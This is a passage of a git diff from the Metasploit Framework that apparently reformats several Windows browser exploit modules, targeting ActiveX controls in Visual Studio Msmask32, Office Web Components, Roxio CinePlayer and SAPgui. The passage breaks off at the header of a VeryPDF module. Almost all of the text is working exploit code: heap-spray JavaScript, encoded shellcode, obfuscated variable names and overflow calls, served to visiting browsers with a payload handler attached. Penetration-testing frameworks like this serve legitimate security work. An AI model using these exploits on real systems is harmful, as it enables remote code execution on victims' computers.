-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode.
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Create some nops.	
-		nops    = Rex::Text.to_unescape(make_nops(4))
-	
-		# Randomize the javascript variable names.
-		vname  = rand_text_alpha(rand(100) + 1)
-		var_i  = rand_text_alpha(rand(30)  + 2)
-		rand1  = rand_text_alpha(rand(100) + 1)
-		rand2  = rand_text_alpha(rand(100) + 1)
-		rand3  = rand_text_alpha(rand(100) + 1)
-		rand4  = rand_text_alpha(rand(100) + 1)
-		rand5  = rand_text_alpha(rand(100) + 1)
-		rand6  = rand_text_alpha(rand(100) + 1)
-		rand7  = rand_text_alpha(rand(100) + 1)
-		rand8  = rand_text_alpha(rand(100) + 1)
-		rand9  = rand_text_alpha(rand(100) + 1)
-		rand10  = rand_text_alpha(rand(100) + 1)
-		rand11  = rand_text_alpha(rand(100) + 1)
-
-		content = %Q|
-<html>
-	<script language="javascript">
-	var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="';
-	var #{rand2}='"></object>';
-	var #{rand3} = '';
-	for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
-	var #{rand4} = unescape("#{shellcode}");
-	var #{rand5} = (#{rand4}.length * 2);
-	var #{rand6} = unescape("#{nops}");
-	var #{rand7} = 0x0c0c0c0c;
-	var #{rand8} = 0x100000;
-	var #{rand9} = #{rand8} - (#{rand5} + 1);
-	var #{rand10} = (#{rand7}+#{rand8})/#{rand8};
-	var #{rand11} = new Array();
-	while (#{rand6}.length*2<#{rand9})
-	{ #{rand6} += #{rand6}; }
-	#{rand6} = #{rand6}.substring(0,#{rand9}/2);
-	for (#{var_i}=0;#{var_i}<#{rand10};#{var_i}++)
-	{ #{rand11}[#{var_i}] = #{rand6} + #{rand4}; }
-	document.write(#{rand1}+#{rand3}+#{rand2});
-	</script>
-</html>
-			|
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-		
-		# Handle the payload
-		handler(cli)
-	end
-
-end
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft Visual Studio Msmask32.ocx ActiveX Buffer Overflow.',
+			'Description'    => %q{
+					This module exploits a stack overflow in Microsoft's Visual Studio 6.0.
+					When passing a specially crafted string to the Mask parameter of the
+					Msmask32.ocx ActiveX Control, an attacker may be able to execute arbitrary
+					code.
+				},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'koshi', 'MC' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+				    	[ 'CVE', '2008-3704' ],
+					[ 'BID','30674' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP2 IE 6.0 SP0-SP2', { 'Ret' => '' } ]	
+				],
+			'DisclosureDate' => 'Aug 13 2008',
+			'DefaultTarget'  => 0))
+
+			register_options(
+				[
+					OptString.new('URIPATH', [ true, "The URI to use.", "/" ])
+				], self.class)
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload.
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode.
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Create some nops.	
+		nops    = Rex::Text.to_unescape(make_nops(4))
+	
+		# Randomize the javascript variable names.
+		vname  = rand_text_alpha(rand(100) + 1)
+		var_i  = rand_text_alpha(rand(30)  + 2)
+		rand1  = rand_text_alpha(rand(100) + 1)
+		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(rand(100) + 1)
+		rand5  = rand_text_alpha(rand(100) + 1)
+		rand6  = rand_text_alpha(rand(100) + 1)
+		rand7  = rand_text_alpha(rand(100) + 1)
+		rand8  = rand_text_alpha(rand(100) + 1)
+		rand9  = rand_text_alpha(rand(100) + 1)
+		rand10  = rand_text_alpha(rand(100) + 1)
+		rand11  = rand_text_alpha(rand(100) + 1)
+
+		content = %Q|
+<html>
+	<script language="javascript">
+	var #{rand1}='<object classid="clsid:C932BA85-4374-101B-A56C-00AA003668DC"><param name="Mask" value="';
+	var #{rand2}='"></object>';
+	var #{rand3} = '';
+	for (#{var_i}=1;#{var_i}<=2145;#{var_i}++){#{rand3}=#{rand3}+unescape("%0c");}
+	var #{rand4} = unescape("#{shellcode}");
+	var #{rand5} = (#{rand4}.length * 2);
+	var #{rand6} = unescape("#{nops}");
+	var #{rand7} = 0x0c0c0c0c;
+	var #{rand8} = 0x100000;
+	var #{rand9} = #{rand8} - (#{rand5} + 1);
+	var #{rand10} = (#{rand7}+#{rand8})/#{rand8};
+	var #{rand11} = new Array();
+	while (#{rand6}.length*2<#{rand9})
+	{ #{rand6} += #{rand6}; }
+	#{rand6} = #{rand6}.substring(0,#{rand9}/2);
+	for (#{var_i}=0;#{var_i}<#{rand10};#{var_i}++)
+	{ #{rand11}[#{var_i}] = #{rand6} + #{rand4}; }
+	document.write(#{rand1}+#{rand3}+#{rand2});
+	</script>
+</html>
+			|
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
diff --git a/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb b/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb
index 3dcb580b1f..fc8e5f24d6 100644
--- a/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb
+++ b/modules/exploits/windows/browser/owc_spreadsheet_msdso.rb
@@ -1,133 +1,133 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
-			'Description'    => %q{
-				This module exploits a memory corruption vulnerability within the Office Web Component
-				Spreadsheet ActiveX control. This module was based on an exploit found in
-				the wild.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => ['unknown','hdm'],
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2009-1136' ],
-					[ 'OSVDB', '55806'],
-					[ 'MSB', 'MS09-043' ],
-					[ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
-					[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
-				],			
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'           => 1024,
-					'BadChars'        => '',	
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]	
-				],
-			'DisclosureDate' => 'Jul 13 2009',
-			'DefaultTarget'  => 0))
-			
-			@javascript_encode_key = rand_text_alpha(rand(10) + 10)
-	end
-
-	def on_request_uri(cli, request)
-
-		# Send a redirect with the javascript encoding key
-		#if (!request.uri.match(/\?\w+/))
-		#	send_local_redirect(cli, "?#{@javascript_encode_key}")
-		#	return
-		#end
-
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-	
-	
-		shellcode = Rex::Text.to_unescape(p.encoded)
-		retaddr   = Rex::Text.to_unescape([target.ret].pack('V'))
-		
-		js = %Q|
-		
-			var xshellcode = unescape("#{shellcode}");
-			
-			var xarray = new Array();
-			var xls = 0x81000-(xshellcode.length*2);
-			var xbigblock = unescape("#{retaddr}");
-			
-			while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
-			var xlh = xbigblock.substring(0, xls / 2);
-			delete xbigblock;
-			
-			for(xi=0; xi<0x99*2; xi++) {
-				xarray[xi] = xlh + xlh + xshellcode;
-			}
-			
-			CollectGarbage();
-			
-			var xobj = new ActiveXObject("OWC10.Spreadsheet");
-			
-			xe = new Array();
-			xe.push(1);
-			xe.push(2);
-			xe.push(0);
-			xe.push(window);
-			
-			for(xi=0; xi < xe.length; xi++){
-				for(xj=0; xj<10; xj++){
-					try { xobj.Evaluate(xe[xi]); } catch(e) { }
-				}
-			}
-			
-			window.status = xe[3] + '';
-			
-			for(xj=0; xj<10; xj++){
-				try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
-			}
-		|
-
-		# Obfuscate it up a bit
-		js = obfuscate_js(js,
-			'Symbols' =>  {
-				'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
-			}
-		).to_s
-				
-		
-		# Encode the javascript payload with the URI key
-		# js = encrypt_js(js, @javascript_encode_key)
-		
-		# Fire off the page to the client
-		send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
-		
-		# Handle the payload
-		handler(cli)
-	end
-
-end
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption',
+			'Description'    => %q{
+				This module exploits a memory corruption vulnerability within the Office Web Component
+				Spreadsheet ActiveX control. This module was based on an exploit found in
+				the wild.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => ['unknown','hdm'],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2009-1136' ],
+					[ 'OSVDB', '55806'],
+					[ 'MSB', 'MS09-043' ],
+					[ 'URL', 'http://xeye.us/blog/2009/07/one-0day/' ],
+					[ 'URL', 'http://www.microsoft.com/technet/security/advisory/973472.mspx' ],
+				],			
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'           => 1024,
+					'BadChars'        => '',	
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]	
+				],
+			'DisclosureDate' => 'Jul 13 2009',
+			'DefaultTarget'  => 0))
+			
+			@javascript_encode_key = rand_text_alpha(rand(10) + 10)
+	end
+
+	def on_request_uri(cli, request)
+
+		# Send a redirect with the javascript encoding key
+		#if (!request.uri.match(/\?\w+/))
+		#	send_local_redirect(cli, "?#{@javascript_encode_key}")
+		#	return
+		#end
+
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+	
+	
+		shellcode = Rex::Text.to_unescape(p.encoded)
+		retaddr   = Rex::Text.to_unescape([target.ret].pack('V'))
+		
+		js = %Q|
+		
+			var xshellcode = unescape("#{shellcode}");
+			
+			var xarray = new Array();
+			var xls = 0x81000-(xshellcode.length*2);
+			var xbigblock = unescape("#{retaddr}");
+			
+			while( xbigblock.length < xls / 2) { xbigblock += xbigblock; }
+			var xlh = xbigblock.substring(0, xls / 2);
+			delete xbigblock;
+			
+			for(xi=0; xi<0x99*2; xi++) {
+				xarray[xi] = xlh + xlh + xshellcode;
+			}
+			
+			CollectGarbage();
+			
+			var xobj = new ActiveXObject("OWC10.Spreadsheet");
+			
+			xe = new Array();
+			xe.push(1);
+			xe.push(2);
+			xe.push(0);
+			xe.push(window);
+			
+			for(xi=0; xi < xe.length; xi++){
+				for(xj=0; xj<10; xj++){
+					try { xobj.Evaluate(xe[xi]); } catch(e) { }
+				}
+			}
+			
+			window.status = xe[3] + '';
+			
+			for(xj=0; xj<10; xj++){
+				try{ xobj.msDataSourceObject(xe[3]); } catch(e) { }
+			}
+		|
+
+		# Obfuscate it up a bit
+		js = obfuscate_js(js,
+			'Symbols' =>  {
+				'Variables' => %W{ xshellcode xarray xls xbigblock xlh xi xobj xe xj}
+			}
+		).to_s
+				
+		
+		# Encode the javascript payload with the URI key
+		# js = encrypt_js(js, @javascript_encode_key)
+		
+		# Fire off the page to the client
+		send_response(cli, "<html><script language='javascript'>#{js}</script></html>")
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb
index 58fb6b1a45..f2a74546b9 100644
--- a/modules/exploits/windows/browser/roxio_cineplayer.rb
+++ b/modules/exploits/windows/browser/roxio_cineplayer.rb
@@ -1,110 +1,110 @@
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Roxio CinePlayer ActiveX Control Buffer Overflow',
-			'Description'    => %q{
-				This module exploits a stack-based buffer overflow in SonicPlayer ActiveX 
-				control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.
-				By setting an overly long value to 'DiskType', an attacker can overrun 
-				a buffer and execute arbitrary code.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'CVE', '2007-1559' ],
-					[ 'OSVDB', '34779' ],
-					[ 'BID', '23412' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00\x09\x0a\x0d'\\",	
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 200, 'Ret' => 0x0C0C0C0C } ]	
-				],
-			'DisclosureDate' => 'Apr 11 2007',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-
-		# Setup exploit buffers
-		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
-		ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
-		blocksize = 0x40000
-		fillto    = 500 
-		offset 	  = target['Offset']
-	
-		# Randomize the javascript variable names
-		sonic	     = rand_text_alpha(rand(100) + 1)
- 		j_shellcode  = rand_text_alpha(rand(100) + 1)
-		j_nops       = rand_text_alpha(rand(100) + 1)
-		j_headersize = rand_text_alpha(rand(100) + 1)
-		j_slackspace = rand_text_alpha(rand(100) + 1)
-		j_fillblock  = rand_text_alpha(rand(100) + 1)
-		j_block      = rand_text_alpha(rand(100) + 1)
-		j_memory     = rand_text_alpha(rand(100) + 1)
-		j_counter    = rand_text_alpha(rand(30) + 2)
-		j_ret        = rand_text_alpha(rand(100) + 1)
-
-		# Build out the message
-		content = %Q|
-<html>
-<object classid='clsid:9F1363DA-0220-462E-B923-9E3C9038896F' id='#{sonic}'></object>
-<script language='javascript'>
-	#{j_shellcode}=unescape('#{shellcode}');
-	#{j_nops}=unescape('#{nops}');
-	#{j_headersize}=20;
-	#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
-	while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
-	#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
-	#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
-	while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
-	#{j_memory}=new Array();
-	for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
-	#{j_ret}='';
-	for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
-	#{sonic}.DiskType(#{j_ret});
-</script>
-</html>
-			|
-
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-
-		# Handle the payload
-		handler(cli)
-	end
-
-end
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Roxio CinePlayer ActiveX Control Buffer Overflow',
+			'Description'    => %q{
+				This module exploits a stack-based buffer overflow in SonicPlayer ActiveX 
+				control (SonicMediaPlayer.dll) 3.0.0.1 installed by Roxio CinePlayer 3.2.
+				By setting an overly long value to 'DiskType', an attacker can overrun 
+				a buffer and execute arbitrary code.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'CVE', '2007-1559' ],
+					[ 'OSVDB', '34779' ],
+					[ 'BID', '23412' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00\x09\x0a\x0d'\\",	
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 200, 'Ret' => 0x0C0C0C0C } ]	
+				],
+			'DisclosureDate' => 'Apr 11 2007',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+
+		# Setup exploit buffers
+		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
+		ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
+		blocksize = 0x40000
+		fillto    = 500 
+		offset 	  = target['Offset']
+	
+		# Randomize the javascript variable names
+		sonic	     = rand_text_alpha(rand(100) + 1)
+ 		j_shellcode  = rand_text_alpha(rand(100) + 1)
+		j_nops       = rand_text_alpha(rand(100) + 1)
+		j_headersize = rand_text_alpha(rand(100) + 1)
+		j_slackspace = rand_text_alpha(rand(100) + 1)
+		j_fillblock  = rand_text_alpha(rand(100) + 1)
+		j_block      = rand_text_alpha(rand(100) + 1)
+		j_memory     = rand_text_alpha(rand(100) + 1)
+		j_counter    = rand_text_alpha(rand(30) + 2)
+		j_ret        = rand_text_alpha(rand(100) + 1)
+
+		# Build out the message
+		content = %Q|
+<html>
+<object classid='clsid:9F1363DA-0220-462E-B923-9E3C9038896F' id='#{sonic}'></object>
+<script language='javascript'>
+	#{j_shellcode}=unescape('#{shellcode}');
+	#{j_nops}=unescape('#{nops}');
+	#{j_headersize}=20;
+	#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
+	while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
+	#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
+	#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
+	while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
+	#{j_memory}=new Array();
+	for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
+	#{j_ret}='';
+	for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
+	#{sonic}.DiskType(#{j_ret});
+</script>
+</html>
+			|
+
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+
+		# Handle the payload
+		handler(cli)
+	end
+
+end
diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
index dee7c8407e..fdf653ed28 100644
--- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
+++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
@@ -1,116 +1,116 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+###
+## This file is part of the Metasploit Framework and may be subject to
+## redistribution and commercial restrictions. Please see the Metasploit
+## Framework web site for more information on licensing and terms of use.
+## http://metasploit.com/framework/
+###
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'SAP AG SAPgui EAI WebViewer3D Buffer Overflow',
-			'Description'    => %q{
-					This module exploits a stack overflow in Siemens Unigraphics Solutions
-					Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled
-					with SAPgui. When passing an overly long string the SaveViewToSessionFile()
-					method, arbitrary code may be executed.
-				},
-			'License'        => MSF_LICENSE,
-			'Author'         => [ 'MC' ], 
-			'Version'        => '$Revision$',
-			'References'     => 
-				[
-					[ 'CVE', '2007-4475' ],
-					[ 'OSVDB', '53066' ],
-					[ 'US-CERT-VU','985449' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00",
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]	
-				],
-			'DisclosureDate' => 'Mar 31 2009',
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-
-	def check_dependencies
-		use_zlib
-	end
-
-	def on_request_uri(cli, request)
-		# Re-generate the payload.
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode.
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Create some nops.	
-		nops    = Rex::Text.to_unescape(make_nops(4))
-	
-		# Set the return.
-		ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)
-				
-		# Randomize the javascript variable names.
-		vname  = rand_text_alpha(rand(100) + 1)
-		var_i  = rand_text_alpha(rand(30)  + 2)
-		rand1  = rand_text_alpha(rand(100) + 1)
-		rand2  = rand_text_alpha(rand(100) + 1)
-		rand3  = rand_text_alpha(rand(100) + 1)
-		rand4  = rand_text_alpha(rand(100) + 1)
-		rand5  = rand_text_alpha(rand(100) + 1)
-		rand6  = rand_text_alpha(rand(100) + 1)
-		rand7  = rand_text_alpha(rand(100) + 1)
-		rand8  = rand_text_alpha(rand(100) + 1)
-
-		content = %Q|
-		<html>
-			<object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
-			<script language="JavaScript">
-				var #{rand1} = unescape('#{shellcode}');
-				var #{rand2} = unescape('#{nops}');
-				var #{rand3} = 20;
-				var #{rand4} = #{rand3} + #{rand1}.length;
-				while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
-				var #{rand5} = #{rand2}.substring(0,#{rand4});
-				var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
-				while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
-				var #{rand7} = new Array();
-				for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
-				var #{rand8} = "";
-				for (#{var_i} = 0; #{var_i} < 12500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
-				#{vname}.SaveViewToSessionFile(#{rand8});
-			</script>
-		</html>
-			|
-
-		content = Rex::Text.randomize_space(content)
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response_html(cli, content)
-		
-		# Handle the payload
-		handler(cli)
-	end
-
-end
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'SAP AG SAPgui EAI WebViewer3D Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack overflow in Siemens Unigraphics Solutions
+					Teamcenter Visualization EAI WebViewer3D ActiveX control that is bundled
+					with SAPgui. When passing an overly long string the SaveViewToSessionFile()
+					method, arbitrary code may be executed.
+				},
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'MC' ], 
+			'Version'        => '$Revision$',
+			'References'     => 
+				[
+					[ 'CVE', '2007-4475' ],
+					[ 'OSVDB', '53066' ],
+					[ 'US-CERT-VU','985449' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]	
+				],
+			'DisclosureDate' => 'Mar 31 2009',
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+
+	def check_dependencies
+		use_zlib
+	end
+
+	def on_request_uri(cli, request)
+		# Re-generate the payload.
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode.
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Create some nops.	
+		nops    = Rex::Text.to_unescape(make_nops(4))
+	
+		# Set the return.
+		ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, "or cl,[edx]").encode_string * 2)
+				
+		# Randomize the javascript variable names.
+		vname  = rand_text_alpha(rand(100) + 1)
+		var_i  = rand_text_alpha(rand(30)  + 2)
+		rand1  = rand_text_alpha(rand(100) + 1)
+		rand2  = rand_text_alpha(rand(100) + 1)
+		rand3  = rand_text_alpha(rand(100) + 1)
+		rand4  = rand_text_alpha(rand(100) + 1)
+		rand5  = rand_text_alpha(rand(100) + 1)
+		rand6  = rand_text_alpha(rand(100) + 1)
+		rand7  = rand_text_alpha(rand(100) + 1)
+		rand8  = rand_text_alpha(rand(100) + 1)
+
+		content = %Q|
+		<html>
+			<object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
+			<script language="JavaScript">
+				var #{rand1} = unescape('#{shellcode}');
+				var #{rand2} = unescape('#{nops}');
+				var #{rand3} = 20;
+				var #{rand4} = #{rand3} + #{rand1}.length;
+				while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
+				var #{rand5} = #{rand2}.substring(0,#{rand4});
+				var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
+				while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
+				var #{rand7} = new Array();
+				for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
+				var #{rand8} = "";
+				for (#{var_i} = 0; #{var_i} < 12500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
+				#{vname}.SaveViewToSessionFile(#{rand8});
+			</script>
+		</html>
+			|
+
+		content = Rex::Text.randomize_space(content)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response_html(cli, content)
+		
+		# Handle the payload
+		handler(cli)
+	end
+
+end
diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb
index 8901962677..60f00f5610 100644
--- a/modules/exploits/windows/browser/verypdf_pdfview.rb
+++ b/modules/exploits/windows/browser/verypdf_pdfview.rb
@@ -1,114 +1,114 @@
-###
-## This file is part of the Metasploit Framework and may be subject to
-## redistribution and commercial restrictions. Please see the Metasploit
-## Framework web site for more information on licensing and terms of use.
-## http://metasploit.com/framework/
-###
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
+###
+## This file is part of the Metasploit Framework and may be subject to
+## redistribution and commercial restrictions. Please see the Metasploit
+## Framework web site for more information on licensing and terms of use.
+## http://metasploit.com/framework/
+###
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
-
